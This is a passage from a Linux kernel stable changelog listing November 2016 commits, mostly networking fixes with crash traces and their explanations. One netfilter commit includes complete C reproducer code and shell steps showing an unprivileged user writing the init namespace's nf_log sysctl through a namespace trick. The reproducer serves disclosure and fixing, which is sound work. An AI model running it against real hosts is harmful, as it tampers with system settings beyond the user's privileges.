- 21 Nov, 2016 22 commits
-
-
Eric Dumazet authored
[ Upstream commit ac6e7800 ] With syzkaller help, Marco Grassi found a bug in TCP stack, crashing in tcp_collapse() Root cause is that sk_filter() can truncate the incoming skb, but TCP stack was not really expecting this to happen. It probably was expecting a simple DROP or ACCEPT behavior. We first need to make sure no part of TCP header could be removed. Then we need to adjust TCP_SKB_CB(skb)->end_seq Many thanks to syzkaller team and Marco for giving us a reproducer. Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Marco Grassi <marco.gra@gmail.com> Reported-by: Vladis Dronov <vdronov@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Stephen Suryaputra Lin authored
[ Upstream commit 969447f2 ] In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0 and then the state of the neigh for the new_gw is checked. If the state isn't valid then the redirected route is deleted. This behavior is maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway is assigned to peer->redirect_learned.a4 before calling ipv4_neigh_lookup(). After commit 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again."), ipv4_neigh_lookup() is performed without the rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw) isn't zero, the function uses it as the key. The neigh is most likely valid since the old_gw is the one that sends the ICMP redirect message. Then the new_gw is assigned to fib_nh_exception. The problem is: the new_gw ARP may never gets resolved and the traffic is blackholed. So, use the new_gw for neigh lookup. Changes from v1: - use __ipv4_neigh_lookup instead (per Eric Dumazet). Fixes: 5943634f ("ipv4: Maintain redirect and PMTU info in struct rtable again.") Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 34fad54c ] After Tom patch, thoff field could point past the end of the buffer, this could fool some callers. If an skb was provided, skb->len should be the upper limit. If not, hlen is supposed to be the upper limit. Fixes: a6e544b0 ("flow_dissector: Jump to exit code in __skb_flow_dissect") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Yibin Yang <yibyang@cisco.com Acked-by: Alexander Duyck <alexander.h.duyck@intel.com> Acked-by: Willem de Bruijn <willemb@google.com> Acked-by: Alexei Starovoitov <ast@kernel.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David Ahern authored
[ Upstream commit 9d1a6c4e ] icmp_send is called in response to some event. The skb may not have the device set (skb->dev is NULL), but it is expected to have an rt. Update icmp_route_lookup to use the rt on the skb to determine L3 domain. Fixes: 613d09b3 ("net: Use VRF device index for lookups on TX") Signed-off-by: David Ahern <dsa@cumulusnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Soheil Hassas Yeganeh authored
[ Upstream commit 3023898b ] Do not send the next message in sendmmsg for partial sendmsg invocations. sendmmsg assumes that it can continue sending the next message when the return value of the individual sendmsg invocations is positive. It results in corrupting the data for TCP, SCTP, and UNIX streams. For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream of "aefgh" if the first sendmsg invocation sends only the first byte while the second sendmsg goes through. Datagram sockets either send the entire datagram or fail, so this patch affects only sockets of type SOCK_STREAM and SOCK_SEQPACKET. Fixes: 228e548e ("net: Add sendmmsg socket system call") Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com> Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: Willem de Bruijn <willemb@google.com> Signed-off-by: Neal Cardwell <ncardwell@google.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Alexander Duyck authored
[ Upstream commit fd0285a3 ] The display of /proc/net/route has had a couple issues due to the fact that when I originally rewrote most of fib_trie I made it so that the iterator was tracking the next value to use instead of the current. In addition it had an off by 1 error where I was tracking the first piece of data as position 0, even though in reality that belonged to the SEQ_START_TOKEN. This patch updates the code so the iterator tracks the last reported position and key instead of the next expected position and key. In addition it shifts things so that all of the leaves start at 1 instead of trying to report leaves starting with offset 0 as being valid. With these two issues addressed this should resolve any off by one errors that were present in the display of /proc/net/route. Fixes: 25b97c01 ("ipv4: off-by-one in continuation handling in /proc/net/route") Cc: Andy Whitcroft <apw@canonical.com> Reported-by: Jason Baron <jbaron@akamai.com> Tested-by: Jason Baron <jbaron@akamai.com> Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
David Ahern authored
[ Upstream commit 5d41ce29 ] icmp6_send is called in response to some event. The skb may not have the device set (skb->dev is NULL), but it is expected to have a dst set. Update icmp6_send to use the dst on the skb to determine L3 domain. Fixes: ca254490 ("net: Add VRF support to IPv6 stack") Signed-off-by: David Ahern <dsa@cumulusnetworks.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Daniel Borkmann authored
[ Upstream commit 483bed2b ] Commit a6ed3ea6 ("bpf: restore behavior of bpf_map_update_elem") added an extra per-cpu reserve to the hash table map to restore old behaviour from pre prealloc times. When non-prealloc is in use for a map, then problem is that once a hash table extra element has been linked into the hash-table, and the hash table is destroyed due to refcount dropping to zero, then htab_map_free() -> delete_all_elements() will walk the whole hash table and drop all elements via htab_elem_free(). The problem is that the element from the extra reserve is first fed to the wrong backend allocator and eventually freed twice. Fixes: a6ed3ea6 ("bpf: restore behavior of bpf_map_update_elem") Reported-by: Dmitry Vyukov <dvyukov@google.com> Signed-off-by: Daniel Borkmann <daniel@iogearbox.net> Acked-by: Alexei Starovoitov <ast@kernel.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Marcelo Ricardo Leitner authored
[ Upstream commit 7233bc84 ] sctp_wait_for_connect() currently already holds the asoc to keep it alive during the sleep, in case another thread release it. But Andrey Konovalov and Dmitry Vyukov reported an use-after-free in such situation. Problem is that __sctp_connect() doesn't get a ref on the asoc and will do a read on the asoc after calling sctp_wait_for_connect(), but by then another thread may have closed it and the _put on sctp_wait_for_connect will actually release it, causing the use-after-free. Fix is, instead of doing the read after waiting for the connect, do it before so, and avoid this issue as the socket is still locked by then. There should be no issue on returning the asoc id in case of failure as the application shouldn't trust on that number in such situations anyway. This issue doesn't exist in sctp_sendmsg() path. Reported-by: Dmitry Vyukov <dvyukov@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com> Reviewed-by: Xin Long <lucien.xin@gmail.com> Acked-by: Neil Horman <nhorman@tuxdriver.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 990ff4d8 ] While fuzzing kernel with syzkaller, Andrey reported a nasty crash in inet6_bind() caused by DCCP lacking a required method. Fixes: ab1e0a13 ("[SOCK] proto: Add hashinfo member to struct proto") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Cc: Arnaldo Carvalho de Melo <acme@redhat.com> Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 1aa9d1a0 ] dccp_v6_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmpv6_notify() are more than enough. Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 6706a97f ] dccp_v4_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmp_socket_deliver() are more than enough. This patch might allow to process more ICMP messages, as some routers are still limiting the size of reflected bytes to 28 (RFC 792), instead of extended lengths (RFC 1812 4.3.2.3) Signed-off-by: Eric Dumazet <edumazet@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 346da62c ] Andrey reported following warning while fuzzing with syzkaller WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290 Kernel panic - not syncing: panic_on_warn set ... CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00 Call Trace: [< inline >] __dump_stack lib/dump_stack.c:15 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116 [< inline >] exit_task_work include/linux/task_work.h:21 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156 [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2 Dumping ftrace buffer: (ftrace buffer empty) Kernel Offset: disabled Fix this the same way we did for TCP in commit 565b7b2d ("tcp: do not send reset to already closed sockets") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit c3f24cfb ] Andrey Konovalov reported following error while fuzzing with syzkaller : IPv4: Attempt to release alive inet socket ffff880068e98940 kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN Modules linked in: CPU: 1 PID: 3905 Comm: a.out Not tainted 4.9.0-rc3+ #333 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 task: ffff88006b9e0000 task.stack: ffff880068770000 RIP: 0010:[<ffffffff819ead5f>] [<ffffffff819ead5f>] selinux_socket_sock_rcv_skb+0xff/0x6a0 security/selinux/hooks.c:4639 RSP: 0018:ffff8800687771c8 EFLAGS: 00010202 RAX: ffff88006b9e0000 RBX: 1ffff1000d0eee3f RCX: 1ffff1000d1d312a RDX: 1ffff1000d1d31a6 RSI: dffffc0000000000 RDI: 0000000000000010 RBP: ffff880068777360 R08: 0000000000000000 R09: 0000000000000002 R10: dffffc0000000000 R11: 0000000000000006 R12: ffff880068e98940 R13: 0000000000000002 R14: ffff880068777338 R15: 0000000000000000 FS: 00007f00ff760700(0000) GS:ffff88006cd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020008000 CR3: 000000006a308000 CR4: 00000000000006e0 Stack: ffff8800687771e0 ffffffff812508a5 ffff8800686f3168 0000000000000007 ffff88006ac8cdfc ffff8800665ea500 0000000041b58ab3 ffffffff847b5480 ffffffff819eac60 ffff88006b9e0860 ffff88006b9e0868 ffff88006b9e07f0 Call Trace: [<ffffffff819c8dd5>] security_sock_rcv_skb+0x75/0xb0 security/security.c:1317 [<ffffffff82c2a9e7>] sk_filter_trim_cap+0x67/0x10e0 net/core/filter.c:81 [<ffffffff82b81e60>] __sk_receive_skb+0x30/0xa00 net/core/sock.c:460 [<ffffffff838bbf12>] dccp_v4_rcv+0xdb2/0x1910 net/dccp/ipv4.c:873 [<ffffffff83069d22>] ip_local_deliver_finish+0x332/0xad0 net/ipv4/ip_input.c:216 [< inline >] NF_HOOK_THRESH ./include/linux/netfilter.h:232 [< inline >] NF_HOOK ./include/linux/netfilter.h:255 [<ffffffff8306abd2>] ip_local_deliver+0x1c2/0x4b0 net/ipv4/ip_input.c:257 [< inline >] dst_input ./include/net/dst.h:507 [<ffffffff83068500>] ip_rcv_finish+0x750/0x1c40 net/ipv4/ip_input.c:396 [< inline >] NF_HOOK_THRESH ./include/linux/netfilter.h:232 [< inline >] NF_HOOK ./include/linux/netfilter.h:255 [<ffffffff8306b82f>] ip_rcv+0x96f/0x12f0 net/ipv4/ip_input.c:487 [<ffffffff82bd9fb7>] __netif_receive_skb_core+0x1897/0x2a50 net/core/dev.c:4213 [<ffffffff82bdb19a>] __netif_receive_skb+0x2a/0x170 net/core/dev.c:4251 [<ffffffff82bdb493>] netif_receive_skb_internal+0x1b3/0x390 net/core/dev.c:4279 [<ffffffff82bdb6b8>] netif_receive_skb+0x48/0x250 net/core/dev.c:4303 [<ffffffff8241fc75>] tun_get_user+0xbd5/0x28a0 drivers/net/tun.c:1308 [<ffffffff82421b5a>] tun_chr_write_iter+0xda/0x190 drivers/net/tun.c:1332 [< inline >] new_sync_write fs/read_write.c:499 [<ffffffff8151bd44>] __vfs_write+0x334/0x570 fs/read_write.c:512 [<ffffffff8151f85b>] vfs_write+0x17b/0x500 fs/read_write.c:560 [< inline >] SYSC_write fs/read_write.c:607 [<ffffffff81523184>] SyS_write+0xd4/0x1a0 fs/read_write.c:599 [<ffffffff83fc02c1>] entry_SYSCALL_64_fastpath+0x1f/0xc2 It turns out DCCP calls __sk_receive_skb(), and this broke when lookups no longer took a reference on listeners. Fix this issue by adding a @refcounted parameter to __sk_receive_skb(), so that sock_put() is used only when needed. Fixes: 3b24d854 ("tcp/dccp: do not touch listener sk_refcnt under synflood") Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 79d8665b ] After my commit, tcp_sendmsg() might restart its loop after processing socket backlog. If sk_err is set, we blindly return an error, even though we copied data to user space before. We should instead return number of bytes that could be copied, otherwise user space might resend data and corrupt the stream. This might happen if another thread is using recvmsg(MSG_ERRQUEUE) to process timestamps. Issue was diagnosed by Soheil and Willem, big kudos to them ! Fixes: d41a69f1 ("tcp: make tcp_sendmsg() aware of socket backlog") Signed-off-by: Eric Dumazet <edumazet@google.com> Cc: Willem de Bruijn <willemb@google.com> Cc: Soheil Hassas Yeganeh <soheil@google.com> Cc: Yuchung Cheng <ycheng@google.com> Cc: Neal Cardwell <ncardwell@google.com> Tested-by: Soheil Hassas Yeganeh <soheil@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Lance Richardson authored
[ Upstream commit 9ee6c5dc ] Some configurations (e.g. geneve interface with default MTU of 1500 over an ethernet interface with 1500 MTU) result in the transmission of packets that exceed the configured MTU. While this should be considered to be a "bad" configuration, it is still allowed and should not result in the sending of packets that exceed the configured MTU. Fix by dropping the assumption in ip_finish_output_gso() that locally originated gso packets will never need fragmentation. Basic testing using iperf (observing CPU usage and bandwidth) have shown no measurable performance impact for traffic not requiring fragmentation. Fixes: c7ba65d7 ("net: ip: push gso skb forwarding handling down the stack") Reported-by: Jan Tluka <jtluka@redhat.com> Signed-off-by: Lance Richardson <lrichard@redhat.com> Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit ac9e70b1 ] Imagine initial value of max_skb_frags is 17, and last skb in write queue has 15 frags. Then max_skb_frags is lowered to 14 or smaller value. tcp_sendmsg() will then be allowed to add additional page frags and eventually go past MAX_SKB_FRAGS, overflowing struct skb_shared_info. Fixes: 5f74f82e ("net:Add sysctl_max_skb_frags") Signed-off-by: Eric Dumazet <edumazet@google.com> Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com> Cc: Håkon Bugge <haakon.bugge@oracle.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eli Cooper authored
[ Upstream commit 23f4ffed ] skb->cb may contain data from previous layers. In the observed scenario, the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so that small packets sent through the tunnel are mistakenly fragmented. This patch unconditionally clears the control buffer in ip6tunnel_xmit(), which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier. Cc: stable@vger.kernel.org Signed-off-by: Eli Cooper <elicooper@gmx.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Andy Gospodarek authored
[ Upstream commit fcdefcca ] Current bgmac code initializes some DMA settings in the receive control register for some hardware and then immediately clears those settings. Not clearing those settings results in ~420Mbps *improvement* in throughput; this system can now receive frames at line-rate on Broadcom 5871x hardware compared to ~520Mbps today. I also tested a few other values but found there to be no discernible difference in CPU utilization even if burst size and prefetching values are different. On the hardware tested there was no need to keep the code that cleared all but bits 16-17, but since there is a wide variety of hardware that used this driver (I did not look at all hardware docs for hardware using this IP block), I find it wise to move this call up and clear bits just after reading the default value from the hardware rather than completely removing it. This is a good candidate for -stable >=3.14 since that is when the code that was supposed to improve performance (but did not) was introduced. Signed-off-by: Andy Gospodarek <gospo@broadcom.com> Fixes: 56ceecde ("bgmac: initialize the DMA controller of core...") Cc: Hauke Mehrtens <hauke@hauke-m.de> Acked-by: Hauke Mehrtens <hauke@hauke-m.de> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit 4f2e4ad5 ] Sending zero checksum is ok for TCP, but not for UDP. UDPv6 receiver should by default drop a frame with a 0 checksum, and UDPv4 would not verify the checksum and might accept a corrupted packet. Simply replace such checksum by 0xffff, regardless of transport. This error was caught on SIT tunnels, but seems generic. Signed-off-by: Eric Dumazet <edumazet@google.com> Cc: Maciej Żenczykowski <maze@google.com> Cc: Willem de Bruijn <willemb@google.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Eric Dumazet authored
[ Upstream commit e551c32d ] At accept() time, it is possible the parent has a non zero sk_err_soft, leftover from a prior error. Make sure we do not leave this value in the child, as it makes future getsockopt(SO_ERROR) calls quite unreliable. Signed-off-by: Eric Dumazet <edumazet@google.com> Acked-by: Soheil Hassas Yeganeh <soheil@google.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Florian Westphal authored
[ Upstream commit ce6dd233 ] If a congestion control module doesn't provide .undo_cwnd function, tcp_undo_cwnd_reduction() will set cwnd to tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1); ... which makes sense for reno (it sets ssthresh to half the current cwnd), but it makes no sense for dctcp, which sets ssthresh based on the current congestion estimate. This can cause severe growth of cwnd (eventually overflowing u32). Fix this by saving last cwnd on loss and restore cwnd based on that, similar to cubic and other algorithms. Fixes: e3118e83 ("net: tcp: add DCTCP congestion control algorithm") Cc: Lawrence Brakmo <brakmo@fb.com> Cc: Andrew Shewmaker <agshew@gmail.com> Cc: Glenn Judd <glenn.judd@morganstanley.com> Acked-by: Daniel Borkmann <daniel@iogearbox.net> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
- 18 Nov, 2016 18 commits
-
-
Greg Kroah-Hartman authored
-
Jann Horn authored
commit dbb5918c upstream. nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Imre Deak authored
commit fd58753e upstream. Currently the display INIT power domain disabling/enabling happens in a mismatched way in the suspend/resume_early hooks respectively. This can leave display power wells incorrectly disabled in the resume hook if the suspend sequence is aborted for some reason resulting in the suspend/resume hooks getting called but the suspend_late/resume_early hooks being skipped. In particular this change fixes "Unclaimed read from register 0x1e1204" on BYT/BSW triggered from i915_drm_resume()-> intel_pps_unlock_regs_wa() when suspending with /sys/power/pm_test set to devices. Fixes: 85e90679 ("drm/i915: disable power wells on suspend") Cc: Ville Syrjälä <ville.syrjala@linux.intel.com> Cc: David Weinehall <david.weinehall@intel.com> Signed-off-by: Imre Deak <imre.deak@intel.com> Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1476358446-11621-1-git-send-email-imre.deak@intel.com (cherry picked from commit 4c494a57) Signed-off-by: Jani Nikula <jani.nikula@intel.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Grazvydas Ignotas authored
commit 2d7c17be upstream. Looks like .last_flush reference is left at teardown. Leak reported by CONFIG_SLUB_DEBUG. Fixes: 41d9eb2c ("drm/amdgpu: add a fence after the VM flush") Reviewed-by: Chunming Zhou <david1.zhou@amd.com> Reviewed-by: Christian König <christian.koenig@amd.com> Signed-off-by: Grazvydas Ignotas <notasas@gmail.com> Signed-off-by: Alex Deucher <alexander.deucher@amd.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Grazvydas Ignotas authored
commit 0f10425e upstream. To free fences, call_rcu() is used, which calls amdgpu_fence_free() after a grace period. During teardown, there is no guarantee all callbacks have finished, so amdgpu_fence_slab may be destroyed before all fences have been freed. If we are lucky, this results in some slab warnings, if not, we get a crash in one of rcu threads because callback is called after amdgpu has already been unloaded. Fix it with a rcu_barrier(). Fixes: b4413535 ("drm/amdgpu: RCU protected amdgpu_fence_release") Acked-by: Chunming Zhou <david1.zhou@amd.com> Reviewed-by: Christian König <christian.koenig@amd.com> Signed-off-by: Grazvydas Ignotas <notasas@gmail.com> Signed-off-by: Alex Deucher <alexander.deucher@amd.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Arnd Bergmann authored
commit 68a56400 upstream. A bugfix introduced a harmless gcc warning in nfs4_slot_seqid_in_use if we enable -Wmaybe-uninitialized again: fs/nfs/nfs4session.c:203:54: error: 'cur_seq' may be used uninitialized in this function [-Werror=maybe-uninitialized] gcc is not smart enough to conclude that the IS_ERR/PTR_ERR pair results in a nonzero return value here. Using PTR_ERR_OR_ZERO() instead makes this clear to the compiler. The warning originally did not appear in v4.8 as it was globally disabled, but the bugfix that introduced the warning got backported to stable kernels which again enable it, and this is now the only warning in the v4.7 builds. Fixes: e09c978a ("NFSv4.1: Fix Oopsable condition in server callback races") Signed-off-by: Arnd Bergmann <arnd@arndb.de> Cc: Trond Myklebust <trond.myklebust@primarydata.com> Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Yan, Zheng authored
commit 3890dce1 upstream. If your data pool was pool 0, ceph_file_layout_from_legacy() transform that to -1 unconditionally, which broke upgrades. We only want do that for a fully zeroed ceph_file_layout, so that it still maps to a file_layout_t. If any fields are set, though, we trust the fl_pgpool to be a valid pool. Fixes: 7627151e ("libceph: define new ceph_file_layout structure") Link: http://tracker.ceph.com/issues/17825Signed-off-by: Yan, Zheng <zyan@redhat.com> Signed-off-by: Ilya Dryomov <idryomov@gmail.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Greg Thelen authored
commit f773e36d upstream. While testing OBJFREELIST_SLAB integration with pagealloc, we found a bug where kmem_cache(sys) would be created with both CFLGS_OFF_SLAB & CFLGS_OBJFREELIST_SLAB. When it happened, critical allocations needed for loading drivers or creating new caches will fail. The original kmem_cache is created early making OFF_SLAB not possible. When kmem_cache(sys) is created, OFF_SLAB is possible and if pagealloc is enabled it will try to enable it first under certain conditions. Given kmem_cache(sys) reuses the original flag, you can have both flags at the same time resulting in allocation failures and odd behaviors. This fix discards allocator specific flags from memcg before calling create_cache. The bug exists since 4.6-rc1 and affects testing debug pagealloc configurations. Fixes: b03a017b ("mm/slab: introduce new slab management type, OBJFREELIST_SLAB") Link: http://lkml.kernel.org/r/1478553075-120242-1-git-send-email-thgarnie@google.comSigned-off-by: Greg Thelen <gthelen@google.com> Signed-off-by: Thomas Garnier <thgarnie@google.com> Tested-by: Thomas Garnier <thgarnie@google.com> Acked-by: Christoph Lameter <cl@linux.com> Cc: Pekka Enberg <penberg@kernel.org> Cc: David Rientjes <rientjes@google.com> Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com> Cc: Vladimir Davydov <vdavydov.dev@gmail.com> Cc: Michal Hocko <mhocko@kernel.org> Cc: Johannes Weiner <hannes@cmpxchg.org> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Fabio Estevam authored
commit f91346e8 upstream. An interrupt may occur right after devm_request_irq() is called and prior to the spinlock initialization, leading to a kernel oops, as the interrupt handler uses the spinlock. In order to prevent this problem, move the spinlock initialization prior to requesting the interrupts. Fixes: e4243f13 (mmc: mxs-mmc: add mmc host driver for i.MX23/28) Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com> Reviewed-by: Marek Vasut <marex@denx.de> Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
Ray Jui authored
